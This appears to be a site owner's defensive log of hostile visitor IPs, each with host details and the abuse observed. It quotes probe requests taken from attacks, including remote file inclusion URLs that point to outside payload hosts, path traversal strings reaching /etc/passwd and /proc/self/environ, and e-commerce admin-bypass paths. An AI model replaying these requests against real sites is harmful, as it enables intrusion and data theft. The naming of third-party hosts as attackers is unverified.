70.32.108.113 Hostname: 2nck-j2pr.accessdomain.com
Host: United States – West Hollywood Media Temple Inc.
Web server: 20 websites
Hacker – Trying to access site admin
/admin/administrators.php/login.php
142.4.213.101 Hostname: ks4004147.ip-142-4-213.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
multiple hits on honeypot trap file
217.69.133.248 Hostname: fetcher7-1.p.mail.ru
Host: Russian Federation – Moscow Limited Liability Company Mail.ru
Unwanted search bot
Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http:
//go.mail.ru/help/robots)
83.219.84.220 Host: Netherlands – Amsterdam Is Group B.v.
Web server: 8 websites
Hacker – Remote File Inclusion probe / WordPress timthumb RFI exploit:
xmlrpc.php%22%20/%3E%20%3C!–[if%20lt%20IE%209]%3E%3Cscript%20
src=%22http: //DOMAIN/wp-content/themes/d5-business-line/includes/thumb.php
?src=http: //blogger.com.azarnejat.com/img.phpUser agent: FreeWebMonitoring
SiteChecker/0.1 (+http://www.freewebmonitoring.com)
94.141.35.166 Host: Russian Federation – Voronezh Ic-voronezh Hacker – Looking for site admin
/admin.php
/administrator/index.php
Dictionary attack on /wp-login.php
72.32.36.156 Hostname: fw-n01.wc1.dfw1.stabletransit.com
Host: United States – San Antonio Cloud Sites Wc1.dfw
WordPress admin attack
/blog/wp-admin/
207.155.252.4 Hostname: rodney.cnchost.com
Host: United States – San Jose Concentric
Web server: 7 websites
WordPress admin attack
/wordpress/wp-admin/
72.29.89.77 Host: United States – Orlando Hostdime.com Inc.
Web server: 263 websites
WordPress admin attack
/wp/wp-admin/
87.106.245.51 Hostname: importjf.com
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 10 websites
Hacker – Probing for Joomla JCE RFI exploit
/index.php?option=com_jce&task=plugin&plugin=imgmanager
&file=imgmanager&version=1576&cid=20?src=http:
//www.istanbuldenizotobusu.com/license.php
176.43.31.27 Host: Turkey – Istanbul Tellcom Kartal Fttx Fiber WordPress admin attack
212.117.172.80 Hostname: ip-static-212-117-172-80.as5577.net
Host: Luxembourg – Steinsel Root Sa
Web server: 5 websites
Running a bot with UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
23.228.194.231 Host: United States – Los Angeles Psychz Networks Hacker – Brute Force Dictionary attack on WordPress.
185.25.84.149 Host: United States – Houston Privax Ltd Suspicious activity – looking for URL/+\”nseasy.com\”&num=
188.124.28.79 Hostname: 3162250319.dynamic.vital.net.tr
Host: Turkey – Bursa Vital Teknoloji Telekomunikasyon Bilgisayar Hizmetleri Ve Sanayi Ticaret Ltd Sirketi
WordPress admin attack
115.196.93.136 Host: China – Hangzhou Chinanet-zj Hangzhou Node Network WordPress admin attack
159.83.168.254 Host: United States – Los Angeles County Of Los Angeles Looking for /verify-LAC_Compliance?
69.65.94.117 Hostname: weston-69.65.94.117.myacc.net
Host: United States – Weston Advanced Cable Communications
Malicious user agent – PERL object UA.
Not a valid browser agent
WWW-Mechanize/1.72
187.18.145.4 Host: Brazil – Fortaleza Videomar Rede Nordeste S/a Fake Googlebot
179.210.85.154 Hostname: b3d2559a.virtua.com.br
Host: Brazil – Nilopolis Net Servicos De Comunicacao S.a.Logistica S/a
Fake Googlebot
177.135.158.18 Hostname: tegma.static.gvt.net.br
Host: Brazil – Sao Bernardo Do Campo Tegma Gestao Logistica S/a
Fake Googlebot
54.208.176.186 Hostname: ec2-54-208-176-186.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web scraper / Feed embedder bot
Uaser Agent: GermCrawler
88.238.251.150 Hostname: 88.238.251.150.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirket
Mail server / Dictionary attacker
Bad host
113.143.70.41 China – Xi’an Chinanet Shaanxi Province Network Brute force dictionary attack on WordPress login
95.110.143.119 Hostname: host119-143-110-95.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 4 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.14.103 Hostname: s15412335.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – hummingbirdbakery.com
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.55.185.242 Hostname: 216-55-185-242.dedicated.abac.net
Host: United States – Lenexa Codero
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.252.2.25 Hostname: 87-252-2-25.oxyd.net
Host: France – Paris Oxyd
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.167.99.183 Hostname: ip-72-167-99-183.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
2.50.181.235 Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Spammer – looking for WordPress /xmlrpc.php
Malicious user agent: Java/1.7.0_13
DDoS attack – several hundred requests for xmlrpc.php in short time
64.151.226.153 Host: Canada – Burnaby In2net Network Inc.
Web server: 3 websites – babymyths.com , johncornegge.com , thinkorangemedia.com
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.7.115.94 Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a. Malformed bot – crawled site looking for non-existent or partial links
UA: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
54.225.192.117 Hostname: ec2-54-225-192-117.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 12 websites
rankinsider.com
Another faulty “ranking” website
Indexes non-existent/broken URLS
92.80.119.97 Romania – Bucharest Romtelecom S.a. Looking for WordPress 3.5.2 Java files
54.221.64.115 Hostname: ec2-54-221-64-115.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 11 websites
Trying to hotlink to images
141.0.23.36 Hostname: m05s3-2-26db.ispgateway.de
Host: United States – Seattle Domainfactory Gmbh
Web server: 86 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.74.138.21 Hostname: dslb-088-074-138-021.pools.arcor-ip.net
Host: Germany – Eschborn Vodafone Gmbh
User Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.150.182.152 Hostname: 64-150-182-152.dedicated.codero.net
Host: United States – Lenexa Codero
Web server: 5 websites
User Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
196.40.97.14 Hostname: www91.cpt1.host-h.net
Host: South Africa – Cape Town Cpt Managed
HETZNER
Web server: 200 websites
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.37.87.58 Hostname: mail.penders.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – penders.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.19.136.212 Host: Switzerland – Zurich Clientid Probing for known WordPress vulnerabilities in:
1. Tell A Friend plugin: /wp-content/plugins/tell-a-friend/tell-a-friend.php
2. Braille plugin: /wp-content/plugins/braille/braille.php
142.4.215.194 Hostname: sn63-na.hostingpanel1.com
Host: Canada Montreal Ovh Hosting Inc.
OVH Systems
Web server: 300 websites
Looking for WordPress ReFlex Gallery Plugin exploit vulnerability
//wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
Using known hacker bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
110.45.180.149 Host: Korea, Republic Of Seoul Lg Dacom Kidc
Web server: 47 websites
Attempting osCommerce/Zencart Arbitrary Code Execution exploit:
/admin/sqlpatch.php/password_forgotten.php
/admin/sqlpatch.php/password_forgotten.php?action=execute
173.208.80.53 Hostname: 173.208.80.53.op-net.com
Host: United States – Chicago Ubiquity Server Solutions Chicago
Nobis Technology Group
Looking for local file disclosure exploit
/cart.php?a=byroe&templatefile=../../../configuration.php%00
142.234.220.199 Hostname: 142.234.220.199.rdns.ubiquity.io
Host: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Nobis Technology Group
Web server: 6 websites
Looking for Joomla FCK editor exploit vulnerabily
90.44.210.191 Hostname: AOrleans-158-1-51-191.w90-44.abo.wanadoo.fr
Host: France – Orleans Orange S.a.
Malicious User Agent “Squider/0.01”
67.221.255.75 Host: United States – Houston Internet Archive Spiderred site at very high rate looking for scripts and images
similar to dDoS attack
85.214.47.178 Hostname: h1697071.stratoserver.net
Host: Germany -Berlin Strato Ag
Web server: 5 websites
Looking for Joomla FCK editor exploit:
/images/stories/bot.php
/images/stories/indo.php
207.241.226.239 Hostname: wwwb-live3.us.archive.org
Host: United States – Houston Internet Archive
Internet Archive
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Badly programmed bot
Rule breaker – crawling Java Scripts
144.76.69.142 Hostname: 144-76-69-142.crawler.sistrix.net
Host: Germany – Berlin Server Block
HETZNER-AS Hetzner Online AG
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Sistrix Crawler
Badly programmed bot
Rule breaker
Resource waster
184.107.218.154 Hostname: p2p.courtq.com
Host: Canada – Montreal Parasane
Shared hosting Web server: 25 website
Probing for xmlrpc.php exploit
90.44.210.191 Hostname: AOrleans-158-1-51-191.w90-44.abo.wanadoo.fr
Host: France – Orleans Orange S.a.
Some sort of badly programmed spider
Generated hundreds of 404’s for malformed URLs
212.227.114.154 Hostname: infong548.kundenserver.de
Host: Germany – Karlsruhe 1&1 Internet Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.136.55.143 Host: United Kingdom – Derby Webfusion Internet Solutions
Shared hosting Web server: 13 website
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.118.84.183 Hostname: ns.km32238-12.keymachine.de
Host: Germany – Erfurt Keyweb Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.118.92.5 Hostname: ns.km23726-02.keymachine.de
Host: Germany – Erfurt Keyweb Ag
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.252.2.25 Hostname: 87-252-2-25.oxyd.net
Host: France – Paris Oxyd
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.208.102.248 Hostname: s15357523.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting Web server: 5 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.81.104.122 Host: Peru – Lima America Movil Peru S.a.c.
Web server: 1 website – facilsoft.pe
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.151.226.128 Host: Canada – Burnaby In2net Network Inc.
Shared hosting Web server: 4 website
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.247.24.207 Hostname: vps980dds.dns26.com
Host: France – Villeurbanne Serveur Dedie Client
Web server: 1 website – institutamadeus.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.141.188 Hostname: euve11352.server4you.net
Host: Germany – Berlin Intergenia Ag
Web server: 3 websites – double-d-design.de , dulisha.com , onlineprobistip.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.152.121 Hostname: vs152121.vserver.de
Host: Germany – Berlin Intergenia Ag
Web server: 1 website – mojotion.net
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.157.159 Hostname: euve22130.startvps.com
Host: Germany – Berlin Intergenia Ag
Web server: 1 website – bcmempleo.org
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.53.4 Hostname: lasvegas-nv-datacenter.com
Host: United States – Las Vegas Las Vegas Nv Datacenter
Web server: 1 website – abhaytechnologies.com
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.31.196.160 Hostname: jn478.jn-hebergement.com
Host: France – Marseille Jaguar Network Sas
Shared hosting web server: 28 websites
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
91.209.192.2 Host: Netherlands – Rotterdam Drecomm Bv
Web server: 1 website – betermetarbo.nl
BOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
217.170.194.64 Hostname: vps-1000267-208.stwadmin.net
Host: Norway – Oslo Servetheworld As
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
212.227.114.154 Hostname: infong548.kundenserver.de
Host: Germany – Karlsruhe 1&1 Internet Ag
LFI (local file inclusion) hack attempt
/wp-admin/post.php?post=25&action=/proc/self/environ%00
/wp-admin/post.php?post=../../../../../../../../../../etc/passwd
%00&action=edit
173.236.69.196 Hostname: dedisvr01.beehause.com
Host: United States – Chicago Singlehop Inc.
Shared hosting web server: 28 websites
LFI (local file inclusion) hack attempt
/wp-admin/post.php?post=25&action=/proc/self/environ%00
/wp-admin/post.php?post=../../../../../../../../../../etc/passwd
%00&action=editBOTNET Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.145.31 Hostname: h1742161.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 1 website – handball-landsberg.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.189.125 Hostname: euve19829.vserver.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
193.169.195.61 Host: Latvia – Internet Access Provider Brute Force / dictionary attacker
Trying to force login to WordPress with user name admin
62.75.137.207 Hostname: euve2396.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 1 website – evezocker.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.55.121.123 Host: Spain – Madrid Iam Informatica Del Ayuntamiento De Madrid
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
//shopadmin/administrators.php/login.php
54.214.19.208 Hostname:ec2-54-214-19-208.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Web server: 3 websites – clickhorse.com.br , igniscom.com.br , supportemarchador.com.br
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.245.19 Hostname: ssr-vermittlung.de
Host: Germany – Hurth Intergenia Ag
Web server: 2 websites -servcc10.net , ssr-vermittlung.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.255.19 Hostname: s15855202.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – testingwd.de
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.235.66.228 Hostname: advais.com
Host: United States – Green Bay Netsonic
Shared hosting web server: 12 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
194.63.140.126 Host: Russian Federation – Moscow Superservers Ltd
User Agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
209.172.35.154 Host: Canada – Montreal Iweb Dedicated Hd
Web server: 1 website – skwppv.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.55.73.74 Hostname: server.cepublishing.com
Host: United States – Houston Theplanet.com Internet Services Inc
Shared hosting web server: 7 websites
WordPress trackback spammer
62.75.252.219 Hostname: london219.server4you.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
69.54.28.180 Hostname: rb-sip2-180.greenmountainaccess.net
Host: United States – Bomoseen Gma
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.193.199.41 Hostname: static-70-170-73-69.nocdirect.com
Host: France – Antibes Amen
Web server: 2 websites – aprim.experts-comptables.fr , uranie-conseil.fr
Trying to upload malware using recently discovered VBulletin exploit
/core/install/upgrade.php
92.136.158.221 Hostname: AToulouse-652-1-232-221.w92-136.abo.wanadoo.fr
Host: France – Toulouse Orange S.a.
Badly programmed crawler – generate lot of 404 errors
98.151.193.103 Hostname: cpe-98-151-193-103.socal.res.rr.com
Host: United States – Canyon Country Time Warner Cable Internet Llc
Crawling site for links with:
Xenu Link Sleuth/1.3.8
85.17.29.205 Hostname: nl1.vpn-confidentiel.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Dictionary attacker trying to access WordPress with user name “admin”
93.114.42.145 Hostname: lh17921.voxility.net
Host: Romania – Balotesti Voxility Srl
Shared hosting web server: 108 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hacker bot User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.9.2) Gecko/20100115 Firefox/3.6
89.221.250.12 Hostname: www12.aname.net
Host: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting web server: 865 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
207.58.182.172 Hostname: ns1.webportfolio.co.za
Host: United States – Mclean Servint
Shared hosting web server: 29 websites
Looking for scripts and other bad requests:
/apache_pb2.gif
/drupal.js
/tableheader.js/
/tabledrag.js
/misc/CVS/Tag
/misc/ahah.js
/CHANGELOG
/COLLAPSE.txt
69.73.170.70 Hostname: static-70-170-73-69.nocdirect.com
Host: United States – New York City Landis Holdings Inc
Web server: 1 website – alaswaq.tv
Comment spammer – running spam bot from this website/IP
139.1.148.6 Host: Germany – Frankfurt Am Main Gedas Operational Services Gmbh & Co. Kg Comment spammer – spam bot
Perl Object UA: WWW-Mechanize/1.72
64.131.73.48 Hostname: vps.mayawebservices.net
Host: United States – Mclean Servint
Shared hosting web server: 40 websites
Hacker bot looking known vulnerability in
/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
108.58.206.82 Hostname: ool-6c3ace52.static.optonline.net
Host: United States – Fairfield Fairfiel Med Group
Looking for Adobe ColdFusion directory traversal exploit:
/CFIDE/administrator/index.cfm
85.17.122.174 Hostname: 85-17-122-174.dyn.isp.wi-free.org
Host: Netherlands – Amsterdam Leaseweb B.v.
Looking for using VBulletin exploit: /core/install/upgrade.php
Looking for Linux server exploit: /scripts/run-tests.sh
91.197.19.103 Hostname: NAT-103.astra.od.ua
Host: Ukraine – Illichivs’k Astratelkom Llc
Trying to upload malware using recently discovered VBulletin exploit
/core/install/upgrade.php
74.208.198.184 Hostname: u15368113.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.240.30.56 Host: Lithuania – Vilnius Penki Kontinentai Ltd. Comment spammer
Bad host
85.214.95.38 Hostname: h1487364.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.131.73.48 Hostname: vps.mayawebservices.net
Host: Mexico – United States Mclean Servint
Shared hosting web server: 39 websites
Hacker looking for known vulnerability in OpenFlashChart library
/library/openflashchart/php-ofc-library/ofc_upload_image.php
Vulnrable systems include Drupal and Joomla versions of CiviCRM
148.243.214.3 Hostname: na-148-243-214-3.static.avantel.net.mx
Host: Mexico – Mexico City Sistema De Informacion Y Comunicacion Del Estado
Shared hosting web server: 7 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.253.3.254 Hostname: 88.253.3.254.dynamic.ttnet.com.tr
Host: Turkey – Ceyhan Turk Telekomunikasyon Anonim Sirketi
Brute force / Dictionary attacker
89.188.143.35 Hostname: ediweb2.editions.it
Host: Italy – Sassari Televideocom Srlt
Shared hosting web server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.20.137 Hostname: s15408148.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 2 websites – parcit.de , updatebanksteuerung.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
172.245.214.149
172.245.214.210
Host: United States – Williamsville New Wave Netconnect Llc Comment spammer
24.21.79.112 Hostname: c-24-21-79-112.hsd1.wa.comcast.net
Host: United States – Vancouver Comcast Cable Communications
Looking for WordPress admin vulnerability
Botnet User Agent: Mozilla/5.0 (Windows NT 6.1;
rv:19.0) Gecko/20100101 Firefox/19.0
98.212.107.92 Hostname: c-98-212-107-92.hsd1.il.comcast.net
Host: United States – Calumet City Comcast Cable Communications Inc.
Scanning for admin exploits
Botnet User Agent: Mozilla/5.0 (Windows NT 6.1;
rv:19.0) Gecko/20100101 Firefox/19.0
69.195.71.177 Host: United States – Provo Unified Layer
Shared hosting web server: 4 websites
Scraper / plagiarist – memeposts.com
178.137.41.84 Hostname: 178-137-41-84-kre.broadband.kyivstar.net
Host: Ukraine – Kiev Kyivstar Pjsc
Brute force / dictionary attack on /wp-login.php
200 attempts in 2 minutes
91.151.215.1 Hostname: vs6.Register1.net
Host: United Kingdom – London Serverstream Ltd
Shared hosting web server: 106 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.200.67.74 Host: Russian Federation – Saint Petersburg Ooo Network Of Data-centers Selectel
Shared hosting web server: 52 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/plugins/cms-pack/timthumb.php?src=http: //flickr.com.tr.realityinformatica.com/bad.php
69.64.57.6 Hostname: usloft3432.serverloft.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Repeated requests for /LoginServlet
(Database login exploit attempt)
198.50.211.110 Host: Canada – Montreal Ovh Hosting Inc. Comment spammer
Repeated request for /?p=
Bad host: Montreal Ovh Hosting Inc
96.127.158.50 Hostname: sh1.hostmdm.com
Host: United States – Chicago Singlehop Inc
Some sort of mis-configured bot
Probably a scraper
190.106.203.234 Hostname: 190.106.203.234.tigo.net.gt
Host: Guatemala – Guatemala City Agencia De Vehiculos Kenworth De Centroamerica Sociedad Anonima
Looking for admin exploit
206.253.226.12
206.253.225.213
206.253.226.18
206.253.226.14
206.253.226.22
206.253.226.23
206.253.226.88
206.253.226.148
Host: United States – Clinton Internet Security Systems Spy bot: oBot/2.3.1
User agents:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 99; BBOT 1.0)
Mozilla/5.0 (compatible; oBot/2.3.1; +http: //filterdb.iss.net/crawler/)
Mozilla/5.0 (compatible; oBot/2.3.1; +http: //www-935.ibm.com/services/us/index.wss/detail/iss/a1029077?cntxt=a1027244)
yacybot (webportal-global; x86 Windows 2003 5.2; java 1.7.0_25; Europe/en) http: //yacy.net/bot.html
81.144.138.34
81.144.138.40
Hostname: crawl-81-144-138-34.wotbox.com
crawl-81-144-138-40.wotbox.com
Host: United Kingdom – Coventry Ayima Ltd
Avima SEO Bot – resource waster / spy bot
UA:

Wotbox/2.01 (+http://www.wotbox.com/bot/)
184.82.151.90 Hostname: 184-82-151-90.static.hostnoc.net
Host: United States – Scranton Network Operations Center Inc.
Spammer. Trying to register and add content:
/?q=node/add
/?q=user/register
189.192.114.169 Hostname: customer-PUE-114-169.megared.net.mx
Host: Mexico – Guadalajara Mega Cable S.a. De C.v.
Spammer. Trying to register and add content:
/?q=node/add
/?q=user/register
96.0.254.95 Hostname: 95.vps.opentransfer.com
Host: United States – Columbus Yourserveradmin
OPENTRANSFER-ECOMMERCE – Ecommerce Corporation
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.224.174.86 Hostname: healthenterprisesnetwork.com
Host: United States – Sacramento Softcom America Inc
Malicious bot
BOT/0.1 (BOT for JCE)
91.238.134.75 Hostname: hosted-by.slaskdatacenter.pl
Host: Poland – Tarnowskie Gory Livenet Sp. Z O.o.
Comment spammer
Found honeypot trap
87.110.220.55 Hostname: paula.tups.lv
Host: Latvia – Riga Ltct Server Farm K
Shared hosting web server: 53 websites
Malicious shell script injection probe
/index.php?l==../../../../../../../../../../../../../../../../../../..
/../../../../..//proc/self/environ%0000
96.126.121.239 Hostname: pumpkinbyte.com
Host: United States – Dallas Linode
Shared hosting web server: 5 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/&;sa=U&;ei=gutIUpLpH5Wv4APa_ICQAg&;ved=0CB8QFjAB&;usg=AFQjCNEm37oaOGiZUqKUx6U36j_7NBnqKg/wp-content/plugins/
easy-gallery-slider/timthumb.php?src=http: //blogger.community.usatop100.com/usa.php/wp-content/plugins/easy-gallery-slider/timthumb.php?src=http: //blogger.community.
usatop100.com/usa.php
